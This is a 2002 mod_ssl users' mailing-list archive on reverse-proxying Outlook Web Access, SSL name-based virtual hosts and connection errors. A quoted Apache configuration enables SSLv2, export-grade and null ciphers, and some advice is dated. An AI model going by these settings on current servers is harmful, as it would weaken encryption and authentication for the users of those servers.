______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Nov  7 20:27:09 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id UAA23566; Thu, 7 Nov 2002 20:26:22 +0100 (MET)
Received: by en5.engelschall.com (Sendmail 8.9.2) via SMTP for 
	from th11.opsion.fr id UAA23551; Thu, 7 Nov 2002 20:25:11 +0100 (MET)
Received: from 62.212.108.2 [62.212.108.2] by th11.opsion.fr id 200211071925.0275; Thu, 7 Nov 2002 19:25:02 GMT
From: "Estrade Matthieu" 
To: 
Subject: RE : Is anyone successfully runnin OWA2K behind Apache/mod_ssl? 
Date: Thu, 7 Nov 2002 20:24:57 +0100
Message-ID: <000001c28693$5f309890$0100a8c0@starchicken>
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
X-Priority: 3 (Normal)
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook, Build 10.0.2627
In-reply-to: <200211070906.gA796JQ11063@Iapetos.csfps.de>
Importance: Normal
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000
Content-Transfer-Encoding: 8bit
X-MIME-Autoconverted: from quoted-printable to 8bit by opensource.ee.ethz.ch id UAA23558
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Estrade Matthieu" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Hi,

I will try to explain what I found about owa and apache 1.3 reverse
proxy 

It's possible to reverse proxy owa with apache 1.3, but with owa
configured without ntlm.

1) The authentication process, is sending first a 401 to ask browser to
authenticate with a method, if this first method is not supported by the
browser, it's sending another 401 until browser and owa found the right
authentication method.

The apache 1.3 proxy is not supporting HTTP1.1 so, when it see the 401
coming back from owa, it close the connection btw RP and OWA, the client
is still connected. OWA will now try to send RP the next 401 and it's
impossible because the RP closed the connection.

If you disable in OWA the NTLM method, it will work. If you want to
handle NTLM, you have to try apache 2.0 which handle that really well.

2) 443 --> 80
I used to do that with apache 2.0 but I have few problem with base href,
so I do 443 --> 443 and it's working really well. The aim is to setup a
really low encryption btw RP and OWA to be more faster.

I will try to insert the header you speak about (front-end-https = on)
to see if it's working.

Hope you understood my bad English.

Regards,

Estrade Matthieu


-----Message d'origine-----
De : owner-modssl-users@modssl.org
[mailto:owner-modssl-users@modssl.org] De la part de Volker Borchert
Envoyé : Thursday, November 07, 2002 10:06 AM
À : modssl-users@modssl.org
Objet : Re: Is anyone successfully runnin OWA2K behind Apache/mod_ssl? 

In message <20021107080335.GB26837@trimble.co.nz> you write:

|> We're using Apache/mod_ssl to provide a reverse-proxy to some backend
Web
|> servers, and want to add OWA2K to the list (that's Outlook Web Access
for
|> Microsoft Exchange 2000).

|> Anyone else got any stories about this?

Two things:

1) For me, it seems to work with IE only if I explicitly disallow any
   authentication scheme but Basic. IE defaults to NTLM which doesn't
   seem to work across Apache reverse.

2) OWA inserts a " HTML
   tag which means that you may have to play dirty tricks with DNS
   and/or nsswitch.conf to get it to work from the outside.

	vb
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

__________________________________________________
Modem offert : 150,92 euros remboursés sur le Pack eXtense de Wanadoo ! 
Haut débit à partir de 30 euros/mois : http://www.ifrance.com/_reloc/w



__________________________________________________
Modem offert : 150,92 euros remboursés sur le Pack eXtense de Wanadoo ! 
Haut débit à partir de 30 euros/mois : http://www.ifrance.com/_reloc/w

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Nov  7 23:02:11 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id XAA28950; Thu, 7 Nov 2002 23:01:32 +0100 (MET)
Received: by en5.engelschall.com (Sendmail 8.9.2) via SMTP for 
	from pv182069.reshsg.uci.edu id XAA28882; Thu, 7 Nov 2002 23:00:17 +0100 (MET)
Received: (qmail 1491 invoked from network); 6 Nov 2002 18:36:56 -0000
Received: from dhcp-132.reshsg.uci.edu (HELO ics.uci.edu) (192.168.1.132)
  by pv182069.reshsg.uci.edu with SMTP; 6 Nov 2002 18:36:56 -0000
Message-ID: <3DC96158.5080908@ics.uci.edu>
Date: Wed, 06 Nov 2002 10:37:12 -0800
From: Joachim Feise 
Organization: University of California, Irvine
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.1) Gecko/20020826
X-Accept-Language: en, de
MIME-Version: 1.0
To: modssl-users@modssl.org
CC: "'modssl-announce@modssl.org'" 
Subject: Re: mod_ssl for apache2 2.0.43
References: <45A71B6D6EC4D411B4200002A50941BD9B0735@debnoexc31.de.kworld.kpmg.com>
Content-Type: text/plain; charset=us-ascii; format=flowed
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Joachim Feise 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Paetsch, Christian (BearingPoint extern) wrote:
> Hello,
> 
> I'm looking for the modul mod_ssl for the new apache 2.0.43 server running
> on a window32 platform. 
> I can only find information about the mod_ssl for apache 1.3. 
> Can I still use the latest version of mod_ssl?

Apache 2.x has the ssl code in the main distribution.

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Nov  8 01:32:10 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id BAA05949; Fri, 8 Nov 2002 01:31:15 +0100 (MET)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from pluto.trimble.co.nz id BAA05945; Fri, 8 Nov 2002 01:31:01 +0100 (MET)
Received: (qmail 26118 invoked from network); 8 Nov 2002 13:30:57 +1300
Received: from unknown (HELO thoth.trimble.co.nz) (155.63.248.21)
  by pluto.trimble.co.nz with DES-CBC3-SHA encrypted SMTP; 8 Nov 2002 13:30:57 +1300
Received: (qmail 2231 invoked by uid 403); 8 Nov 2002 13:30:57 +1300
Received: from jhaar@trimble.co.nz by thoth.trimble.co.nz by uid 400 with qmail-scanner-1.15 
 (trophie: 5.500-0829/379/48271. sophie: 2.10/3.61. spamassassin: 2.31.  Clear:. 
 Processed in 0.157005 secs); 08 Nov 2002 00:30:57 -0000
Received: from crom.trimble.co.nz (10.3.0.198)
  by thoth.trimble.co.nz with SMTP; 8 Nov 2002 13:30:56 +1300
Received: (qmail 25386 invoked by uid 500); 8 Nov 2002 00:30:56 -0000
Date: Fri, 8 Nov 2002 13:30:56 +1300
From: Jason Haar 
To: modssl-users@modssl.org
Subject: Re: Is anyone successfully running OWA2K behind Apache/mod_ssl?
Message-ID: <20021108003056.GA25171@trimble.co.nz>
References: <42B8E37890B1E64CB427CE1F260181EAE335@mail00.sc.esilicon.com>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
In-Reply-To: <42B8E37890B1E64CB427CE1F260181EAE335@mail00.sc.esilicon.com>
Organization: Trimble Navigation New Zealand Ltd.
User-Agent: Mutt/1.5.1i
X-Spam-Rating: pluto.trimble.co.nz 1.6.3-jlh 0/2001/A
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Jason Haar 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

On Thu, Nov 07, 2002 at 06:57:36AM -0800, David Marshall wrote:
> The biggest drawbacks to this solution were.
> a. Every time you reboot/restart IIS on the System where OWA is installed, 
>    your security settings will be reset adding "Windows Integrated Authentication" 
>    back to the virtual directories. 

Strange. We've already done that and it does last through reboots.

> b. We had to add a virtual host for every OWA site on Apache that we needed to host.
>    In my environment we have 3 exchange servers and 2 routing groups. 
>    This meant that as we changed our Exchange Topology, that we would have
>    to re-work the Apache front-end proxy.

Ah. That sounds like you're doing this to backend servers - not an OWA
frontend server - sorry for not mentioning that - we're using frontend
servers - specifically to get around the issues of having multiple Exchange
servers.

> After reading the Microsoft Exchange Front-End/Backend documents
> http://www.microsoft.com/downloads/release.asp?releaseid=43997 , We decided
> to evaluate running a Front-End OWA server under SSL with HTTP disabled on a
> separate system from the other Exchange Servers. In the final analysis, we
> decided that this was the right answer for us.

That's alright. I finally think I've figure it out! The problem was that our
Apache reverse-proxy was called "proxy.domain", whereas our OWA2K was called
"owa.domain". Whenever a client asked for
"https://proxy.domain/exchange/..." that would pass through to owa.domain
with a Host: header of "proxy.domain" (as you would expect). However there
is a bug in either OWA or IE5+ that causes OWA2K to generate corrupt XML if
the IIS server doesn't recognise the Host: header as being itself.

So all we did was tell IIS that "proxy.domain" was a valid alias for itself,
and magically OWA2K started working via the reverse-proxy :-)

I feel like I've achieved something this week :-)

-- 
Cheers

Jason Haar
Information Security Manager, Trimble Navigation Ltd.
Phone: +64 3 9635 377 Fax: +64 3 9635 417
PGP Fingerprint: 7A2E 0407 C9A6 CAF6 2B9F 8422 C063 5EBB FE1D 66D1
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Nov  8 07:37:05 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id HAA15193; Fri, 8 Nov 2002 07:36:10 +0100 (MET)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from visp.engelschall.com id HAA15173; Fri, 8 Nov 2002 07:35:46 +0100 (MET)
Received: by visp.engelschall.com (Postfix, from userid 1005)
	id 02F794CE752; Fri,  8 Nov 2002 07:35:48 +0100 (CET)
Received: by en1.engelschall.com (Postfix, from userid 10000)
	id 36C082869A; Fri,  8 Nov 2002 07:34:50 +0100 (CET)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from botinas.labtechsys.com id FAA11782; Fri, 8 Nov 2002 05:02:22 +0100 (MET)
Received: from GUSLAP2000 ([24.112.148.21]) by botinas.labtechsys.com
          (Post.Office MTA v3.5.3 release 223 ID# 0-0U10L2S100V35)
          with SMTP id com for ;
          Thu, 7 Nov 2002 21:58:16 -0500
Message-ID: <000001c286db$15834740$0c02a8c0@GUSLAP2000>
From: gbrasil@labtechsys.com (Gustavo Brasil)
To: 
Subject: Errno 111
Date: Thu, 7 Nov 2002 22:56:51 -0500
Organization: Labtech Systems Inc
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.2800.1106
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2800.1106
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: gbrasil@labtechsys.com (Gustavo Brasil)
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Hi, I had mod_ssl up and running for more then a year on Linux RedHat 7.0,
today it just stoped, it starts fine with no error but if i test it with
"openssl s_client xxxxx:443" i get the following error:

connection refused.
errno:111

Http works fine bur Https doesn't

thanks,
Gustavo Brasil
Labtech Systems Inc.
www.labtechsys.com
905 814 8836 x-201
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Nov  8 09:11:29 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id JAA18845; Fri, 8 Nov 2002 09:10:21 +0100 (MET)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from ns0b.swx.com id JAA18812; Fri, 8 Nov 2002 09:09:37 +0100 (MET)
Received: from gate0a.unix.swx.ch (gate0a [192.168.252.17])
	by ns0b.swx.com (8.12.6/8.12.6) with ESMTP id gA889Wt9002730
	for ; Fri, 8 Nov 2002 09:09:32 +0100 (MET)
Received: from SOMEXEVS001.ex.ordersx.org ([127.0.0.1])
	by gate0a.unix.swx.ch (8.12.6/8.12.6) with ESMTP id gA889VOP009225
	for ; Fri, 8 Nov 2002 09:09:31 +0100 (MET)
content-class: urn:content-classes:message
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4910.0300
Subject: RE: ModSSL and VirtualHosts
Date: Fri, 8 Nov 2002 09:09:31 +0100
Message-ID: <484A6CA492BE654395D208B1D8D5393972F6E8@SOMEXEVS001.ex.ordersx.org>
Importance: normal
Thread-Topic: ModSSL and VirtualHosts
Thread-Index: AcKGh5CL3ARWz7nJRVikQhwzlWWJLgAc0jiw
From: "Boyle Owen" 
To: 
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Boyle Owen" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

It's an ingenious attempt and it may seem to work but there is a lot
going on that you might not be aware of. Consider what happens when
someone types "https://domain2/" into their browser:

- the browser gets the IP address for domain2 (which is the same IP
address as domain1) and then sends a packet to port 433 at that address
requesting an SSL session.
- the server receives an SSL request on port 443. That's all it gets. So
what VH is it to use? By default, it just looks in the first one - so it
sends "domain1.cert".
- the browser gets the cert and opens it. "That's funny", thinks the
browser, "I asked for domain2, but this cert is for domain1... I'd
better warn my master". So it pops up an alert window warning you that
"the certificate does not match the site name". You have to click OK.
- the browser is reassured so continues with the SSL channel setup. It
then requests the webpage from the server.
- the server gets the encrypted request and, since it now has a working
SSL channel, decrypts it. Now it can see inside and get the host header.
So at last it can see that he request is for domain2. So it goes into
the domain2 VH  where it hits the rewrite rule! So it sends a redirect
to send the browser to domain2:444.
- The browser gets the redirect and off it goes to domain2:444. This
time there is no ambiguity since there is only one VH. So it gets the
correct cert, sends it to the browser and this time there is no warning
because now the site and cert match.

The point of the story is that you are still using the "wrong" cert to
set up the initial SSL channel. Unless you define the port in the
original request, there is no way to get the server to identify the
correct VH - it will always use the first one.

To put it another way, you don't really need to bother with the VH on
port 444 - if you don't mind that the session is established with the
domain1 cert, you can just leave it and after the SSL channel is
established name-based VH will work. Alternatively, you can put the
rewrite rule into the domain1 VH (though you need to change it so it
trips on the servername) and dispense with the domain2:443 VH.

The trouble with using the "wrong" cert is that it is not a general
solution since it violates the authentication aspect of SSL. SSL is not
only about encryption, it is also about ensuring that the site you are
talking to is authentic. Encryption is like sending your money to the
bank in an armoured car. Authentication is making sure the armoured car
really does go to the bank.

Rgds,

Owen Boyle

>-----Original Message-----
>From: fred [mailto:fred@skyturn.net]
>Sent: Donnerstag, 7. November 2002 18:54
>To: modssl-users@modssl.org
>Subject: Re: ModSSL and VirtualHosts
>
>
>Hello, I was the first one (of today)
>I anderstand your ###!!!???. Its ###:::/??? to repeat ten 
>times the same 
>thing. I hope that my answer will help people to configure 
>multi ssl with one 
>IP.
>Personaly I can not have an other IP so I use the same ip 
>whith different 
>port and I use mod Rewrite to redirect to the new port and it 
>work very well.
>ex:
>
>Listen *:80
>Listen *:443
>Listen *:444
>
>
>NameVirtualHost MY_IP:443
>
>
>  DocumentRoot "/home/web/SSL/dmaine1/htdocs"
>  ServerName domaine1
>  ServerAdmin root@localhost
>  SSLEngine on
>  SSLCipherSuite                 
>ALL:!ADH:!EXPORT56:RC4+RSA:+HIGH:+MEDIUM:+LOW:+SSLv2:+EXP:+eNULL
>  SSLCertificateFile /usr/local/apache/conf/ssl.crt/domaine1.crt
>  SSLCertificateKeyFile /usr/local/apache/conf/ssl.key/domaine1.key
>  
>    SSLOptions +StdEnvVars
>  
>  
>    SSLOptions +StdEnvVars
>  
>  SetEnvIf User-Agent ".*MSIE.*" \
>         nokeepalive ssl-unclean-shutdown \
>         downgrade-1.0 force-response-1.0
>  CustomLog /usr/local/apache/logs/ssl_request_log \
>          "%t %h %{SSL_PROTOCOL}x %{SSL_CIPHER}x \"%r\" %b"
>
>
>  DocumentRoot "/home/web/SSL/domaine2/htdocs"
>  ServerName domaine2
>  ServerAdmin root@localhost
>  RewriteEngine On
>  RewriteRule ^/(.*)$ https://domaine2:444/$1 [R]
>  SSLEngine on
>  SSLCipherSuite 
>ALL:!ADH:!EXPORT56:RC4+RSA:+HIGH:+MEDIUM:+LOW:+SSLv2:+EXP:+eNULL
>  SSLCertificateFile /usr/local/apache/conf/ssl.crt/domaine2.crt
>  SSLCertificateKeyFile /usr/local/apache/conf/ssl.key/domaine2.key
>  
>    SSLOptions +StdEnvVars
>  
>  
>    SSLOptions +StdEnvVars
>  
>  SetEnvIf User-Agent ".*MSIE.*" \
>         nokeepalive ssl-unclean-shutdown \
>         downgrade-1.0 force-response-1.0
>  CustomLog /usr/local/apache/logs/ssl_request_log \
>          "%t %h %{SSL_PROTOCOL}x %{SSL_CIPHER}x \"%r\" %b"
>
>
>
>  DocumentRoot "/home/web/SSL/domaine2/htdocs"
>  ServerName domaine2
>  ServerAdmin root@localhost
>  SSLEngine on
>  SSLCipherSuite 
>ALL:!ADH:!EXPORT56:RC4+RSA:+HIGH:+MEDIUM:+LOW:+SSLv2:+EXP:+eNULL
>  SSLCertificateFile /usr/local/apache/conf/ssl.crt/domaine2.crt
>  SSLCertificateKeyFile /usr/local/apache/conf/ssl.key/domaine2.key
>  
>    SSLOptions +StdEnvVars
>  
>  
>    SSLOptions +StdEnvVars
>  
>  SetEnvIf User-Agent ".*MSIE.*" \
>         nokeepalive ssl-unclean-shutdown \
>         downgrade-1.0 force-response-1.0
>  CustomLog /usr/local/apache/logs/ssl_request_log \
>          "%t %h %{SSL_PROTOCOL}x %{SSL_CIPHER}x \"%r\" %b"
>
>
>
>
>On Thursday 7 November 2002 18:21, you wrote:
>> Sorry. That last post was harsh - it's been a long day. But everyone
>> (including me) who moves into SSL immediately wonders why 
>name-based VHs
>> don't work. You are the second person *today* to ask this...
>>
>> The problem is that the packet is encrypted so apache can't 
>see the Host
>> header so doesn't know what VH to use. But it needs the VH 
>in  order to
>> decide on the cert - it's a classic Catch-22. There is no 
>workaround (we
>> had a guy today trying rewrite rules - marks for originality, but no
>> cigar). You have to use separate IPs or ports...
>>
>> Rgds,
>>
>> Owen Boyle
>>
>> >-----Original Message-----
>>
>> From: Alex [mailto:alex@damngeek.com]
>>
>> >Sent: Donnerstag, 7. November 2002 17:55
>> >To: modssl-users@modssl.org
>> >Subject: ModSSL and VirtualHosts
>> >
>> >
>> >I think I'm missing a few key points here, so I'm not able 
>to find the
>> >answers by myself. Hate to sound like a newbie, but I'm
>> >getting a little
>> >frustrated.
>> >
>> >Lets say I have this:
>> >
>> >
>> >DocumentRoot /usr/local/www/domain1
>> >ServerName domain1.dom
>> >
>> >
>> >
>> >DocumentRoot /usr/local/www/wwwdomain1
>> >ServerName www.domain1.dom
>> >
>> >
>> >
>> >This works just great, both sites would show up and show the correct
>> >directory. I can use the * or the ip address for the 
>VirtualHost, both
>> >with the same results.
>> >
>> >All I can get with the https://... is the default directory
>> >saying apache
>> >is installed. Now I can change the default directory in the 
>VirtualHost
>> >for _default_:443 and it will point to which ever directory I
>> >want, with
>> >ssl.
>> >
>> >How do I get https://domain1.dom the same as http://domain1.dom, and
>> >https://www.domain1.dom the same as http://www.domain1.dom?
>> >
>> >Or is it by design only to work with one directory?
>> >
>> >
>> >Oh, and to possibly add to any confusion, this is a freebsd
>> >4.7 box with
>> >a private ip (firewalled) with apache+mod_ssl-1.3.27+2.8.12.
>> >
>> >Any help would be appreciated.
>> >
>> >Thanks for your time.
>> >
>> 
>>______________________________________________________________________
>> >Apache Interface to OpenSSL (mod_ssl)                   
www.modssl.org
> >User Support Mailing List
modssl-users@modssl.org
> >Automated List Manager
majordomo@modssl.org
>
> This message is for the named person's use only. It may contain
> confidential, proprietary or legally privileged information. No
> confidentiality or privilege is waived or lost by any mistransmission.
> If you receive this message in error, please notify the sender
urgently
> and then immediately delete the message and any copies of it from your
> system. Please also immediately destroy any hardcopies of the message.
> You must not, directly or indirectly, use, disclose, distribute,
print,
> or copy any part of this message if you are not the intended
recipient.
> The sender's company reserves the right to monitor all e-mail
> communications through their networks. Any views expressed in this
> message are those of the individual sender, except where the message
> states otherwise and the sender is authorised to state them to be the
> views of the sender's company.
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

This message is for the named person's use only. It may contain
confidential, proprietary or legally privileged information. No
confidentiality or privilege is waived or lost by any mistransmission.
If you receive this message in error, please notify the sender urgently
and then immediately delete the message and any copies of it from your
system. Please also immediately destroy any hardcopies of the message.
You must not, directly or indirectly, use, disclose, distribute, print,
or copy any part of this message if you are not the intended recipient.
The sender's company reserves the right to monitor all e-mail
communications through their networks. Any views expressed in this
message are those of the individual sender, except where the message
states otherwise and the sender is authorised to state them to be the
views of the sender's company. 
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Nov  8 11:28:09 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id LAA24009; Fri, 8 Nov 2002 11:27:07 +0100 (MET)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from maggotts.rnib.org.uk id LAA24005; Fri, 8 Nov 2002 11:26:38 +0100 (MET)
From: John.Airey@rnib.org.uk
Received: from pboroweb.rnib.org.uk (pboroweb.rnib.org.uk [194.128.16.17])
	by maggotts.rnib.org.uk (8.11.6/8.11.6) with ESMTP id gA8APxq00537
	for ; Fri, 8 Nov 2002 10:26:22 GMT
Received: by pboroweb.rnib.org.uk with Internet Mail Service (5.5.2650.21)
	id ; Fri, 8 Nov 2002 10:25:54 -0000
Message-ID: <9B66BBD37D5DD411B8CE00508B69700F033F22EF@pborolocal.rnib.org.uk>
To: modssl-users@modssl.org
Subject: RE: Is anyone successfully running OWA2K behind Apache/mod_ssl?
Date: Fri, 8 Nov 2002 10:25:49 -0000 
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.5.2650.21)
Content-Type: text/plain;
	charset="iso-8859-1"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: John.Airey@rnib.org.uk
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

I'd suggest that you disable the basic authentication as well, once it all
works.

This does mean that users would have to enter their username and password
twice, but does keep out worms like "Code Red". After all, your exchange
server isn't a public site.

On Exchange 5.5/IIS4 we've disabled both Challenge/Response (as this
prevents Netscape or Mozilla getting into your mailbox) and basic
authentication. We do get a niggly message "your password will expire in 0
days", but we just ignore it.

- 
John Airey, BSc (Jt Hons), CNA, RHCE
Internet systems support officer, ITCSD, Royal National Institute of the
Blind,
Bakewell Road, Peterborough PE2 6XU,
Tel.: +44 (0) 1733 375299 Fax: +44 (0) 1733 370848 John.Airey@rnib.org.uk 

If we could learn one thing from September 11th 2001, it would be the utter
absurdity of moral relativism.



> -----Original Message-----
> From: David Marshall [mailto:dmarshall@esilicon.com]
> Sent: 07 November 2002 14:58
> To: modssl-users@modssl.org
> Subject: RE: Is anyone successfully running OWA2K behind 
> Apache/mod_ssl?
> 
> 
> Jason,
> 
> I had this running on RedHat 7.2. Apache 1.3.22/Mod_SSL
> 
> Here are the steps...
> 1. Obtain Apache Mod mod_proxy_add_forward.c
>    Modify the code to set the header "font-end-https: on".
> 
>    add the following
> 
>    /* turn on front-end-https header, so OWA will put HTTPS 
> into urls */ 
>    ap_table_set(r->headers_in, "front-end-https","on");
> 
>    Compile and install mod_proxy_add_forward.c. 
>    I used command "apxs -i -c mod_proxy_add_forward.c" 
>   
> 2. Add a line to your httpd.conf file: 
>    "LoadModule proxy_add_forward_module 
> /usr/lib/apache/1.3/mod_proxy_add_forward.so" 
>     replacing /usr/lib/apache/1.3 with the path that apxs 
> installs the module.
> 
> 3. Add the following directives to the virtual host section 
> of your apache
>    configuration files, replacing FQDN with the fully 
> qualified domain name you
>    want to use, NOT the address of the exchange server:
>     ProxyPass /exchange/ http://FQDN/exchange/
>     ProxyPass /public/ http://FQDN/public/
>     ProxyPass /exchweb/ http://FQDN/exchweb/
> 
> 4. Make sure that external dns resolves the FQDN to the 
> Apache proxy server
> 
> 5. Modify your /etc/hosts on the Apache proxy server
>    Add the FQDN to resolve to the ip address of the OWA server 
> 
> 6. On the Server where OWA is installed, Turn off Windows 
> Integrated Authentication
>    run Internet Services Manager 
>    ( "Programs"->"Administrative Tools"->"Internet Services Manager" )
> 
>    Expand to your OWA website and Right-click the OWA site and select 
>    "Properties", on the resulting Dialog, select the 
> "Directory Security" 
>    Tab, Then Edit the "Anonymous access and authentication control", 
>    remove "Windows Integrated Authentication" and turn on 
> "Basic Authentication"
> 
>    note: you must repeat this step every time you restart IIS 
> or reboot this machine.
> 
> I must tell that although the solution "worked", we did not 
> put this solution into production. 
> 
> The biggest drawbacks to this solution were.
> a. Every time you reboot/restart IIS on the System where OWA 
> is installed, 
>    your security settings will be reset adding "Windows 
> Integrated Authentication" 
>    back to the virtual directories. 
> 
>    We have found no way to resolve this.
> 
> b. We had to add a virtual host for every OWA site on Apache 
> that we needed to host.
>    In my environment we have 3 exchange servers and 2 routing groups. 
>    This meant that as we changed our Exchange Topology, that 
> we would have
>    to re-work the Apache front-end proxy.
> 
> c. Users cannot use the password change option.
> 
> After reading the Microsoft Exchange Front-End/Backend 
> documents 
http://www.microsoft.com/downloads/release.asp?releaseid=43997 , We decided
to evaluate running a Front-End OWA server under SSL with HTTP disabled on a
separate system from the other Exchange Servers. In the final analysis, we
decided that this was the right answer for us.

David Marshall


-----Original Message-----
From: Jason Haar [mailto:Jason.Haar@trimble.co.nz]
Sent: Thursday, November 07, 2002 12:04 AM
To: modssl-users@modssl.org
Subject: Is anyone successfully runnin OWA2K behind Apache/mod_ssl?


We're using Apache/mod_ssl to provide a reverse-proxy to some backend Web
servers, and want to add OWA2K to the list (that's Outlook Web Access for
Microsoft Exchange 2000).

It works fine with OWA from Exchange 5.5 - which was basically just HTML
plus some javascript - but OWA2K (under IE5+) uses all sorts of whizzy M$
stuff, and doesn't work!

If you access OWA2K with a non-IE browser (e.g. Mozilla), OWA2K reverts to
the older format and works fine - it just doesn't work well from IE (ironic
isn't it :-)

It's pretty flakey. IE5.0 works pretty well, IE5.5 works 20% of the time and
IE6 just dies. It goes without saying that all these browsers work fine when
talking directly to the OWA2K server: it's only via the RP that they fail.

I've done packet sniffs and compares and can't see anything out of the
ordinary. I think it's an OWA issue, or an IE security-context issue, but
can't say for sure.

Anyone else got any stories about this?

Thanks

-- 
Cheers

Jason Haar
Information Security Manager, Trimble Navigation Ltd.
Phone: +64 3 9635 377 Fax: +64 3 9635 417
PGP Fingerprint: 7A2E 0407 C9A6 CAF6 2B9F 8422 C063 5EBB FE1D 66D1
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

- 

NOTICE: The information contained in this email and any attachments is 
confidential and may be legally privileged. If you are not the 
intended recipient you are hereby notified that you must not use, 
disclose, distribute, copy, print or rely on this email's content. If 
you are not the intended recipient, please notify the sender 
immediately and then delete the email and any attachments from your 
system.

RNIB has made strenuous efforts to ensure that emails and any 
attachments generated by its staff are free from viruses. However, it 
cannot accept any responsibility for any viruses which are 
transmitted. We therefore recommend you scan all attachments.

Please note that the statements and views expressed in this email 
and any attachments are those of the author and do not necessarily 
represent those of RNIB.

RNIB Registered Charity Number: 226227

Website: http://www.rnib.org.uk 
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Nov  8 11:51:04 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id LAA24748; Fri, 8 Nov 2002 11:50:09 +0100 (MET)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from maggotts.rnib.org.uk id LAA24725; Fri, 8 Nov 2002 11:49:59 +0100 (MET)
From: John.Airey@rnib.org.uk
Received: from pboroweb.rnib.org.uk (pboroweb.rnib.org.uk [194.128.16.17])
	by maggotts.rnib.org.uk (8.11.6/8.11.6) with ESMTP id gA8Ancq01936
	for ; Fri, 8 Nov 2002 10:49:43 GMT
Received: by pboroweb.rnib.org.uk with Internet Mail Service (5.5.2650.21)
	id ; Fri, 8 Nov 2002 10:49:33 -0000
Message-ID: <9B66BBD37D5DD411B8CE00508B69700F033F22F4@pborolocal.rnib.org.uk>
To: modssl-users@modssl.org
Subject: RE: Is anyone successfully running OWA2K behind Apache/mod_ssl?
Date: Fri, 8 Nov 2002 10:49:24 -0000 
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.5.2650.21)
Content-Type: text/plain;
	charset="iso-8859-1"
